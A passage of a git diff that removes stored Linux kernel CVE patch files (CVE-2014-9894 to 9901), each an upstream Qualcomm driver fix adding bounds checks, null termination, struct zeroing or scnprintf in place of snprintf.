- 				struct mdp_hist_lut_data *cfg);
-+static int pp_gm_has_invalid_lut_size(struct mdp_gamut_cfg_data *config);
-+static void pp_gamut_config(struct mdp_gamut_cfg_data *gamut_cfg,
-+				char __iomem *base,
-+				struct pp_sts_type *pp_sts);
- static void pp_pa_config(unsigned long flags, char __iomem *addr,
- 				struct pp_sts_type *pp_sts,
- 				struct mdp_pa_cfg *pa_config);
-@@ -2086,10 +2090,32 @@ int mdss_mdp_dither_config(struct mdp_dither_cfg_data *config,
- 	return 0;
- }
- 
-+static int pp_gm_has_invalid_lut_size(struct mdp_gamut_cfg_data *config)
-+{
-+	if (config->tbl_size[0] != GAMUT_T0_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[1] != GAMUT_T1_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[2] != GAMUT_T2_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[3] != GAMUT_T3_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[4] != GAMUT_T4_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[5] != GAMUT_T5_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[6] != GAMUT_T6_SIZE)
-+		return -EINVAL;
-+	if (config->tbl_size[7] != GAMUT_T7_SIZE)
-+		return -EINVAL;
-+
-+	return 0;
-+}
-+
- int mdss_mdp_gamut_config(struct mdp_gamut_cfg_data *config,
- 					u32 *copyback)
- {
--	int i, j, size_total = 0, ret = 0;
-+	int i, j, ret = 0;
- 
- 	u32 disp_num, dspp_num = 0;
- 	uint16_t *tbl_off;
-@@ -2102,9 +2128,8 @@ int mdss_mdp_gamut_config(struct mdp_gamut_cfg_data *config,
- 	if ((config->block < MDP_LOGICAL_BLOCK_DISP_0) ||
- 		(config->block >= MDP_BLOCK_MAX))
- 		return -EINVAL;
--	for (i = 0; i < MDP_GAMUT_TABLE_NUM; i++)
--		size_total += config->tbl_size[i];
--	if (size_total != GAMUT_TOTAL_TABLE_SIZE)
-+
-+	if (pp_gm_has_invalid_lut_size(config))
- 		return -EINVAL;
- 
- 	mutex_lock(&mdss_pp_mutex);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9894/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9894/ANY/0001.patch
deleted file mode 100644
index 208f38e3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9894/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 83214431cd02674c70402b160b16b7427e28737f Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
-Date: Thu, 3 Oct 2013 16:52:16 -0700
-Subject: qseecom: Ensure incoming "app_name" does not corrupt the kernel stack
-
-Printing a string with that does not have null terminated character,
-would lead to overflow, as the print continues until it finds a null
-terminated character.
-Avoid this issue by explicitly assigning a string with null termination.
-
-Change-Id: I9528db2ba046c514d829097d08c09540588bb1a2
-Signed-off-by: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
----
- drivers/misc/qseecom.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 4c1943b..7ab8089 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -773,6 +773,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- 	if (ret)
- 		return ret;
- 	req.qsee_cmd_id = QSEOS_APP_LOOKUP_COMMAND;
-+	load_img_req.img_name[MAX_APP_NAME_SIZE-1] = '\0';
- 	memcpy(req.app_name, load_img_req.img_name, MAX_APP_NAME_SIZE);
- 
- 	ret = __qseecom_check_app_exists(req);
-@@ -2453,6 +2454,7 @@ static int qseecom_query_app_loaded(struct qseecom_dev_handle *data,
- 	}
- 
- 	req.qsee_cmd_id = QSEOS_APP_LOOKUP_COMMAND;
-+	query_req.app_name[MAX_APP_NAME_SIZE-1] = '\0';
- 	memcpy(req.app_name, query_req.app_name, MAX_APP_NAME_SIZE);
- 
- 	ret = __qseecom_check_app_exists(req);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9895/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9895/ANY/0001.patch
deleted file mode 100644
index 63d33160..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9895/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From cc4b26575602e492efd986e9a6ffc4278cee53b5 Mon Sep 17 00:00:00 2001
-From: Deva Ramasubramanian <dramasub@codeaurora.org>
-Date: Fri, 24 Jan 2014 12:38:37 -0800
-Subject: [media] media: Init the reserved fields of struct media_link_desc
-
-struct media_link_desc is copy_to_user'ed as the return value of
-MEDIA_IOC_ENUM_LINKS. When copying, the driver is omitting to initialise
-the reserved fields.  This commit fixes that by initialising the
-reserved fields to 0.
-
-CRs-Fixed: 570757
-Change-Id: I230e2666c0845cc36399518a0f2c94db664382d1
-Signed-off-by: Deva Ramasubramanian <dramasub@codeaurora.org>
----
- drivers/media/media-device.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/media-device.c b/drivers/media/media-device.c
-index 6f9eb94..4f39838 100644
---- a/drivers/media/media-device.c
-+++ b/drivers/media/media-device.c
-@@ -139,7 +139,7 @@ static long media_device_enum_links(struct media_device *mdev,
- 		unsigned int p;
- 
- 		for (p = 0; p < entity->num_pads; p++) {
--			struct media_pad_desc pad;
-+			struct media_pad_desc pad = {0};
- 			media_device_kpad_to_upad(&entity->pads[p], &pad);
- 			if (copy_to_user(&links.pads[p], &pad, sizeof(pad)))
- 				return -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9896/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9896/ANY/0001.patch
deleted file mode 100644
index 7203bf11..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9896/ANY/0001.patch
+++ /dev/null
@@ -1,86 +0,0 @@
-From 89f2bcf1ac860b0b380e579e9a8764013f263a7d Mon Sep 17 00:00:00 2001
-From: Mitchel Humpherys <mitchelh@codeaurora.org>
-Date: Fri, 25 Oct 2013 12:05:47 -0700
-Subject: msm: ADSPRPC: Add checks for erroneous values
-
-Check for invalid parameters passed in user invocation
-and validate the return values using appropriate macros.
-
-Change-Id: If529873d025ac0c13725efbedda5a58fae327722
-Acked-by: Sathish Ambley <sambley@qti.qualcomm.com>
-Signed-off-by: Mitchel Humpherys <mitchelh@codeaurora.org>
----
- drivers/char/adsprpc.c | 16 +++++++++++-----
- 1 file changed, 11 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index e421135..c8b6c0a 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -199,7 +199,7 @@ static void free_mem(struct fastrpc_buf *buf)
- 					me->smmu.domain_id, 0);
- 			buf->phys = 0;
- 		}
--		if (buf->virt) {
-+		if (!IS_ERR_OR_NULL(buf->virt)) {
- 			ion_unmap_kernel(me->iclient, buf->handle);
- 			buf->virt = 0;
- 		}
-@@ -212,7 +212,7 @@ static void free_map(struct fastrpc_mmap *map)
- {
- 	struct fastrpc_apps *me = &gfa;
- 	if (!IS_ERR_OR_NULL(map->handle)) {
--		if (map->virt) {
-+		if (!IS_ERR_OR_NULL(map->virt)) {
- 			ion_unmap_kernel(me->iclient, map->handle);
- 			map->virt = 0;
- 		}
-@@ -231,13 +231,15 @@ static int alloc_mem(struct fastrpc_buf *buf)
- 	unsigned long len;
- 	buf->handle = 0;
- 	buf->virt = 0;
-+	buf->phys = 0;
- 	heap = me->smmu.enabled ? ION_HEAP(ION_IOMMU_HEAP_ID) :
- 		ION_HEAP(ION_ADSP_HEAP_ID) | ION_HEAP(ION_AUDIO_HEAP_ID);
- 	buf->handle = ion_alloc(clnt, buf->size, SZ_4K, heap, ION_FLAG_CACHED);
- 	VERIFY(err, 0 == IS_ERR_OR_NULL(buf->handle));
- 	if (err)
- 		goto bail;
--	VERIFY(err, 0 != (buf->virt = ion_map_kernel(clnt, buf->handle)));
-+	buf->virt = ion_map_kernel(clnt, buf->handle);
-+	VERIFY(err, 0 == IS_ERR_OR_NULL(buf->virt));
- 	if (err)
- 		goto bail;
- 	if (me->smmu.enabled) {
-@@ -356,6 +358,9 @@ static int get_page_list(uint32_t kernel, uint32_t sc, remote_arg_t *pra,
- 		list[i].num = 0;
- 		list[i].pgidx = 0;
- 		len = pra[i].buf.len;
-+		VERIFY(err, len >= 0);
-+		if (err)
-+			goto bail;
- 		if (!len)
- 			continue;
- 		buf = pra[i].buf.pv;
-@@ -857,7 +862,7 @@ static int fastrpc_internal_invoke(struct fastrpc_apps *me, uint32_t mode,
- 	context_free(ctx);
- 
- 	if (me->smmu.enabled) {
--		bufs = REMOTE_SCALARS_LENGTH(sc);
-+		bufs = REMOTE_SCALARS_INBUFS(sc) + REMOTE_SCALARS_OUTBUFS(sc);
- 		if (fds) {
- 			handles = (struct ion_handle **)(fds + bufs);
- 			for (i = 0; i < bufs; i++)
-@@ -1037,7 +1042,8 @@ static int fastrpc_internal_mmap(struct fastrpc_apps *me,
- 	VERIFY(err, 0 == IS_ERR_OR_NULL(map->handle));
- 	if (err)
- 		goto bail;
--	VERIFY(err, 0 != (map->virt = ion_map_kernel(clnt, map->handle)));
-+	map->virt = ion_map_kernel(clnt, map->handle);
-+	VERIFY(err, 0 == IS_ERR_OR_NULL(map->virt));
- 	if (err)
- 		goto bail;
- 	buf = (void *)mmap->vaddrin;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9897/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9897/ANY/0001.patch
deleted file mode 100644
index c7d0a1b0..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9897/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 46135d80765cb70a914f02a6e7b6abe64679ec86 Mon Sep 17 00:00:00 2001
-From: Mohammad Johny Shaik <mjshai@codeaurora.org>
-Date: Wed, 13 Nov 2013 15:45:34 -0800
-Subject: msm:qdsp6v2: Check null pointer on userspace data argument in kernel
-
-The null pointer check is required to ensure that userspace data
-in kernalspace is not null.
-
-Change-Id: I9e522c393ae643626a4bae03731a73f5d6db6458
-CRs-Fixed: 563752
-Signed-off-by: Mohammad Johny Shaik <mjshai@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index fe6ed29..2bca5e18 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -170,6 +170,9 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 				 */
- 				rc = -EFAULT;
- 			} else {
-+				if (!access_ok(VERIFY_READ, user,
-+					sizeof(struct snd_lsm_event_status)))
-+					rc = -EFAULT;
- 				if (user->payload_size <
- 				    event_status->payload_size) {
- 					pr_debug("%s: provided %dbytes isn't enough, needs %dbytes\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9898/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9898/ANY/0001.patch
deleted file mode 100644
index 15191d3a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9898/ANY/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 80be0e249c906704085d13d4ae446f73913fc225 Mon Sep 17 00:00:00 2001
-From: Baruch Eruchimovitch <baruche@codeaurora.org>
-Date: Mon, 14 Oct 2013 15:49:41 +0300
-Subject: msm: ultrasound: add verifications of some input parameters
-
-Some security vulnerabilities were found.
-To fix them, additional verifications of some input parameters
-are required.
-
-CRs-Fixed: 554575, 554560, 555030
-Change-Id: Ie87a433bcda89c3e462cfd511c168e8306056020
-Signed-off-by: Baruch Eruchimovitch <baruche@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c | 82 ++++++++++++++++++------------
- 1 file changed, 49 insertions(+), 33 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-index 1ea213a..01fcfd9 100644
---- a/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-+++ b/arch/arm/mach-msm/qdsp6v2/ultrasound/usf.c
-@@ -51,6 +51,11 @@
- #define Y_IND 1
- #define Z_IND 2
- 
-+/* Shared memory limits */
-+/* max_buf_size = (port_size(65535*2) * port_num(8) * group_size(3) */
-+#define USF_MAX_BUF_SIZE 3145680
-+#define USF_MAX_BUF_NUM  32
-+
- /* Place for opreation result, received from QDSP6 */
- #define APR_RESULT_IND 1
- 
-@@ -436,6 +441,15 @@ static int config_xx(struct usf_xx_type *usf_xx, struct us_xx_info_type *config)
- 	    (config == NULL))
- 		return -EINVAL;
- 
-+	if ((config->buf_size == 0) ||
-+	    (config->buf_size > USF_MAX_BUF_SIZE) ||
-+	    (config->buf_num == 0) ||
-+	    (config->buf_num > USF_MAX_BUF_NUM)) {
-+		pr_err("%s: wrong params: buf_size=%d; buf_num=%d\n",
-+		       __func__, config->buf_size, config->buf_num);
-+		return -EINVAL;
-+	}
-+
- 	data_map_size = sizeof(usf_xx->encdec_cfg.cfg_common.data_map);
- 	min_map_size = min(data_map_size, config->port_cnt);
- 
-@@ -748,6 +762,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- {
- 	uint32_t timeout = 0;
- 	struct us_detect_info_type detect_info;
-+	struct usm_session_cmd_detect_info *p_allocated_memory = NULL;
- 	struct usm_session_cmd_detect_info usm_detect_info;
- 	struct usm_session_cmd_detect_info *p_usm_detect_info =
- 						&usm_detect_info;
-@@ -774,12 +789,13 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 		uint8_t *p_data = NULL;
- 
- 		detect_info_size += detect_info.params_data_size;
--		p_usm_detect_info = kzalloc(detect_info_size, GFP_KERNEL);
--		if (p_usm_detect_info == NULL) {
-+		 p_allocated_memory = kzalloc(detect_info_size, GFP_KERNEL);
-+		if (p_allocated_memory == NULL) {
- 			pr_err("%s: detect_info[%d] allocation failed\n",
- 			       __func__, detect_info_size);
- 			return -ENOMEM;
- 		}
-+		p_usm_detect_info = p_allocated_memory;
- 		p_data = (uint8_t *)p_usm_detect_info +
- 			sizeof(struct usm_session_cmd_detect_info);
- 
-@@ -789,7 +805,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 		if (rc) {
- 			pr_err("%s: copy params from user; rc=%d\n",
- 				__func__, rc);
--			kfree(p_usm_detect_info);
-+			kfree(p_allocated_memory);
- 			return -EFAULT;
- 		}
- 		p_usm_detect_info->algorithm_cfg_size =
-@@ -806,9 +822,7 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 				    p_usm_detect_info,
- 				    detect_info_size);
- 	if (rc || (detect_info.detect_timeout == USF_NO_WAIT_TIMEOUT)) {
--		if (detect_info_size >
--		    sizeof(struct usm_session_cmd_detect_info))
--			kfree(p_usm_detect_info);
-+		kfree(p_allocated_memory);
- 		return rc;
- 	}
- 
-@@ -828,25 +842,24 @@ static int usf_set_us_detection(struct usf_type *usf, unsigned long arg)
- 					 USF_US_DETECT_UNDEF),
- 					timeout);
- 	/* In the case of timeout, "no US" is assumed */
--	if (rc < 0) {
-+	if (rc < 0)
- 		pr_err("%s: Getting US detection failed rc[%d]\n",
- 		       __func__, rc);
--		return rc;
--	}
--
--	usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
--	detect_info.is_us = (usf_xx->us_detect_type == USF_US_DETECT_YES);
--	rc = copy_to_user((void __user *)arg,
--			  &detect_info,
--			  sizeof(detect_info));
--	if (rc) {
--		pr_err("%s: copy detect_info to user; rc=%d\n",
--			__func__, rc);
--		rc = -EFAULT;
-+	else {
-+		usf->usf_rx.us_detect_type = usf->usf_tx.us_detect_type;
-+		detect_info.is_us =
-+			(usf_xx->us_detect_type == USF_US_DETECT_YES);
-+		rc = copy_to_user((void __user *)arg,
-+				  &detect_info,
-+				  sizeof(detect_info));
-+		if (rc) {
-+			pr_err("%s: copy detect_info to user; rc=%d\n",
-+				__func__, rc);
-+			rc = -EFAULT;
-+		}
- 	}
- 
--	if (detect_info_size > sizeof(struct usm_session_cmd_detect_info))
--		kfree(p_usm_detect_info);
-+	kfree(p_allocated_memory);
- 
- 	return rc;
- } /* usf_set_us_detection */
-@@ -947,16 +960,14 @@ static int usf_set_rx_info(struct usf_type *usf, unsigned long arg)
- 	if (rc)
- 		return rc;
- 
--	if (usf_xx->buffer_size && usf_xx->buffer_count) {
--		rc = q6usm_us_client_buf_alloc(
--					IN,
--					usf_xx->usc,
--					usf_xx->buffer_size,
--					usf_xx->buffer_count);
--		if (rc) {
--			(void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
--			return rc;
--		}
-+	rc = q6usm_us_client_buf_alloc(
-+				IN,
-+				usf_xx->usc,
-+				usf_xx->buffer_size,
-+				usf_xx->buffer_count);
-+	if (rc) {
-+		(void)q6usm_cmd(usf_xx->usc, CMD_CLOSE);
-+		return rc;
- 	}
- 
- 	rc = q6usm_dec_cfg_blk(usf_xx->usc,
-@@ -1175,10 +1186,15 @@ static int usf_get_version(unsigned long arg)
- 		return -EFAULT;
- 	}
- 
--	/* version_info.buf is pointer to place for the version string */
-+	if (version_info.buf_size < sizeof(DRV_VERSION)) {
-+		pr_err("%s: buf_size (%d) < version string size (%d)\n",
-+			__func__, version_info.buf_size, sizeof(DRV_VERSION));
-+		return -EINVAL;
-+	}
-+
- 	rc = copy_to_user(version_info.pbuf,
- 			  DRV_VERSION,
--			  version_info.buf_size);
-+			  sizeof(DRV_VERSION));
- 	if (rc) {
- 		pr_err("%s: copy to version_info.pbuf; rc=%d\n",
- 			__func__, rc);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9899/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9899/ANY/0001.patch
deleted file mode 100644
index 1ef2d7bd..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9899/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 8756624acb1e090b45baf07b2a8d0ebde114000e Mon Sep 17 00:00:00 2001
-From: Saket Saurabh <ssaurabh@codeaurora.org>
-Date: Mon, 30 Sep 2013 17:33:57 +0530
-Subject: ehci-msm2: Add boundary check in echi driver
-
-This change adds boundary check before copying data from userspace
-buffer to ehci local buffer.
-The third parameter passed to copy_from_user() should be minimum of the two
-values between userpsace buffer size count and (local_buffer size - 1). The
-last one byte in local_buffer should be reserved for null terminator.
-
-CRs-Fixed: 547910
-Change-Id: Id3c5432aa3fae3ce9759056b5481b9f516df7764
-Signed-off-by: Saket Saurabh <ssaurabh@codeaurora.org>
----
- drivers/usb/host/ehci-msm2.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/host/ehci-msm2.c b/drivers/usb/host/ehci-msm2.c
-index 221af44..32ed806 100644
---- a/drivers/usb/host/ehci-msm2.c
-+++ b/drivers/usb/host/ehci-msm2.c
-@@ -1059,7 +1059,7 @@ static ssize_t debug_write_phy_data(struct file *file, const char __user *buf,
- 
- 	memset(kbuf, 0, 10);
- 
--	if (copy_from_user(kbuf, buf, count > 10 ? 10 : count))
-+	if (copy_from_user(kbuf, buf, min_t(size_t, sizeof(kbuf) - 1, count)))
- 		return -EFAULT;
- 
- 	if (sscanf(kbuf, "%x", &data) != 1)
-@@ -1084,7 +1084,7 @@ static ssize_t debug_phy_write_addr(struct file *file, const char __user *buf,
- 
- 	memset(kbuf, 0, 10);
- 
--	if (copy_from_user(kbuf, buf, count > 10 ? 10 : count))
-+	if (copy_from_user(kbuf, buf, min_t(size_t, sizeof(kbuf) - 1, count)))
- 		return -EFAULT;
- 
- 	if (sscanf(kbuf, "%x", &temp) != 1)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9900/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9900/ANY/0001.patch
deleted file mode 100644
index 8bc91005..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9900/ANY/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 63c317dbee97983004dffdd9f742a20d17150071 Mon Sep 17 00:00:00 2001
-From: Avijit Kanti Das <avijitnsec@codeaurora.org>
-Date: Wed, 14 May 2014 11:03:56 -0700
-Subject: net: Zeroing the structure ethtool_wolinfo in ethtool_get_wol()
-
-memset() the structure ethtool_wolinfo that has padded bytes
-but the padded bytes have not been zeroed out.
-
-Change-Id: If3fd2d872a1b1ab9521d937b86a29fc468a8bbfe
-Signed-off-by: Avijit Kanti Das <avijitnsec@codeaurora.org>
----
- net/core/ethtool.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/net/core/ethtool.c b/net/core/ethtool.c
-index ce91766..900a05f 100644
---- a/net/core/ethtool.c
-+++ b/net/core/ethtool.c
-@@ -711,11 +711,13 @@ static int ethtool_reset(struct net_device *dev, char __user *useraddr)
- 
- static int ethtool_get_wol(struct net_device *dev, char __user *useraddr)
- {
--	struct ethtool_wolinfo wol = { .cmd = ETHTOOL_GWOL };
-+	struct ethtool_wolinfo wol;
- 
- 	if (!dev->ethtool_ops->get_wol)
- 		return -EOPNOTSUPP;
- 
-+	memset(&wol, 0, sizeof(struct ethtool_wolinfo));
-+	wol.cmd = ETHTOOL_GWOL;
- 	dev->ethtool_ops->get_wol(dev, &wol);
- 
- 	if (copy_to_user(useraddr, &wol, sizeof(wol)))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9901/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9901/ANY/0001.patch
deleted file mode 100644
index 00ba32d7..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9901/ANY/0001.patch
+++ /dev/null
@@ -1,294 +0,0 @@
-From 637f0f7931dd7265ac1c250dc2884d6389c66bde Mon Sep 17 00:00:00 2001
-From: Panvar Vivek <vpanwa@codeaurora.org>
-Date: Thu, 12 Dec 2013 17:17:40 +0530
-Subject: wlan: Replace snprintf with scnprintf
-
-The function snprintf() do not write more than size bytes (including
-the terminating null byte ('\0')). If the output was truncated due
-to this limit then the return value is the number of characters
-(excluding the terminating null byte) which would have been written
-to the final string if enough space had been available. Thus, a
-return value of size or more means that the output was truncated.
-
-Change-Id: Iccf9648961e2ac9eeffa0f824a80fd3798be3870
-CRs-Fixed: 548711
----
- CORE/HDD/src/wlan_hdd_cfg.c     |  2 +-
- CORE/HDD/src/wlan_hdd_hostapd.c |  6 ++--
- CORE/HDD/src/wlan_hdd_scan.c    |  2 +-
- CORE/HDD/src/wlan_hdd_tdls.c    |  9 +++---
- CORE/HDD/src/wlan_hdd_wext.c    | 70 ++++++++++++++++++++++++++++++-----------
- 5 files changed, 62 insertions(+), 27 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg.c b/CORE/HDD/src/wlan_hdd_cfg.c
-index 0fa44de..31d0adc 100644
---- a/CORE/HDD/src/wlan_hdd_cfg.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg.c
-@@ -3240,7 +3240,7 @@ VOS_STATUS hdd_cfg_get_config(hdd_context_t *pHddCtx, char *pBuf, int buflen)
-       {
-          snprintf(valueStr, CFG_VALUE_MAX_LEN, "(unhandled)");
-       }
--      curlen = snprintf(configStr, CFG_ENTRY_MAX_LEN,
-+      curlen = scnprintf(configStr, CFG_ENTRY_MAX_LEN,
-                         "%s=[%s]%s\n",
-                         pRegEntry->RegName,
-                         valueStr,
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index cc2fb0e..d9c965a 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -2350,7 +2350,7 @@ static iw_softap_ap_stats(struct net_device *dev,
- 
-     WLANSAP_GetStatistics((WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext, &statBuffer, (v_BOOL_t)wrqu->data.flags);
- 
--    len = snprintf(pstatbuf, len,
-+    len = scnprintf(pstatbuf, len,
-             "RUF=%d RMF=%d RBF=%d "
-             "RUB=%d RMB=%d RBB=%d "
-             "TUF=%d TMF=%d TBF=%d "
-@@ -3481,7 +3481,7 @@ VOS_STATUS hdd_softap_get_sta_info(hdd_adapter_t *pAdapter, v_U8_t *pBuf, int bu
-     int len = 0;
-     const char sta_info_header[] = "staId staAddress\n";
- 
--    len = snprintf(pBuf, buf_len, sta_info_header);
-+    len = scnprintf(pBuf, buf_len, sta_info_header);
-     pBuf += len;
-     buf_len -= len;
- 
-@@ -3489,7 +3489,7 @@ VOS_STATUS hdd_softap_get_sta_info(hdd_adapter_t *pAdapter, v_U8_t *pBuf, int bu
-     {
-         if(pAdapter->aStaInfo[i].isUsed)
-         {
--            len = snprintf(pBuf, buf_len, "%*d .%02x:%02x:%02x:%02x:%02x:%02x\n",
-+            len = scnprintf(pBuf, buf_len, "%*d .%02x:%02x:%02x:%02x:%02x:%02x\n",
-                                        strlen("staId"),
-                                        pAdapter->aStaInfo[i].ucSTAId,
-                                        pAdapter->aStaInfo[i].macAddrSTA.bytes[0],
-diff --git a/CORE/HDD/src/wlan_hdd_scan.c b/CORE/HDD/src/wlan_hdd_scan.c
-index 8c1d259..9c60557 100644
---- a/CORE/HDD/src/wlan_hdd_scan.c
-+++ b/CORE/HDD/src/wlan_hdd_scan.c
-@@ -534,7 +534,7 @@ static eHalStatus hdd_IndicateScanResult(hdd_scan_info_t *scanInfo, tCsrScanResu
-    /* AGE */
-    event.cmd = IWEVCUSTOM;
-    p = custom;
--   p += snprintf(p, MAX_CUSTOM_LEN, " Age: %lu",
-+   p += scnprintf(p, MAX_CUSTOM_LEN, " Age: %lu",
-                  vos_timer_get_system_ticks() - descriptor->nReceivedTime);
-    event.u.data.length = p - custom;
-    current_event = iwe_stream_add_point (scanInfo->info,current_event, end,
-diff --git a/CORE/HDD/src/wlan_hdd_tdls.c b/CORE/HDD/src/wlan_hdd_tdls.c
-index 9a6149f..f616af2 100644
---- a/CORE/HDD/src/wlan_hdd_tdls.c
-+++ b/CORE/HDD/src/wlan_hdd_tdls.c
-@@ -1400,11 +1400,12 @@ int wlan_hdd_tdls_get_all_peers(hdd_adapter_t *pAdapter, char *buf, int buflen)
- 
- 
-     init_len = buflen;
--    len = snprintf(buf, buflen, "\n%-18s%-3s%-4s%-3s%-5s\n", "MAC", "Id", "cap", "up", "RSSI");
-+    len = scnprintf(buf, buflen, "\n%-18s%-3s%-4s%-3s%-5s\n",
-+            "MAC", "Id", "cap", "up", "RSSI");
-     buf += len;
-     buflen -= len;
-     /*                           1234567890123456789012345678901234567 */
--    len = snprintf(buf, buflen, "---------------------------------\n");
-+    len = scnprintf(buf, buflen, "---------------------------------\n");
-     buf += len;
-     buflen -= len;
- 
-@@ -1417,7 +1418,7 @@ int wlan_hdd_tdls_get_all_peers(hdd_adapter_t *pAdapter, char *buf, int buflen)
-     pHddTdlsCtx = WLAN_HDD_GET_TDLS_CTX_PTR(pAdapter);
-     if (NULL == pHddTdlsCtx) {
-         mutex_unlock(&tdls_lock);
--        len = snprintf(buf, buflen, "TDLS not enabled\n");
-+        len = scnprintf(buf, buflen, "TDLS not enabled\n");
-         return len;
-     }
-     for (i = 0; i < 256; i++) {
-@@ -1428,7 +1429,7 @@ int wlan_hdd_tdls_get_all_peers(hdd_adapter_t *pAdapter, char *buf, int buflen)
- 
-             if (buflen < 32+1)
-                 break;
--            len = snprintf(buf, buflen,
-+            len = scnprintf(buf, buflen,
-                 MAC_ADDRESS_STR"%3d%4s%3s%5d\n",
-                 MAC_ADDR_ARRAY(curr_peer->peerMac),
-                 curr_peer->staId,
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 0cd68bd..b141df0 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -413,7 +413,7 @@ void hdd_wlan_get_version(hdd_adapter_t *pAdapter, union iwreq_data *wrqu,
-         pHWversion = "Unknown";
-     }
- 
--    wrqu->data.length = snprintf(extra, WE_MAX_STR_LEN,
-+    wrqu->data.length = scnprintf(extra, WE_MAX_STR_LEN,
-                                  "Host SW:%s, FW:%s, HW:%s",
-                                  QWLAN_VERSIONSTR,
-                                  pSWversion,
-@@ -2551,7 +2551,7 @@ static int iw_get_rssi(struct net_device *dev,
-    {
-       /* we are not connected or our SSID is too long
-          so we cannot report an rssi */
--      rc = snprintf(cmd, len, "OK");
-+      rc = scnprintf(cmd, len, "OK");
-    }
-    else
-    {
-@@ -2566,7 +2566,7 @@ static int iw_get_rssi(struct net_device *dev,
-       {
-           /* append the rssi to the ssid in the format required by
-              the WiFI Framework */
--          rc = snprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi);
-+          rc = scnprintf(&cmd[ssidlen], len - ssidlen, " rssi %d", s7Rssi);
-       }
-       else
-       {
-@@ -4412,19 +4412,19 @@ static int iw_get_char_setnone(struct net_device *dev, struct iw_request_info *i
-                 if ( WLAN_ADAPTER == adapter_num )
-                 {
-                     useAdapter = pAdapter;
--                    buf = snprintf(extra + len, WE_MAX_STR_LEN - len,
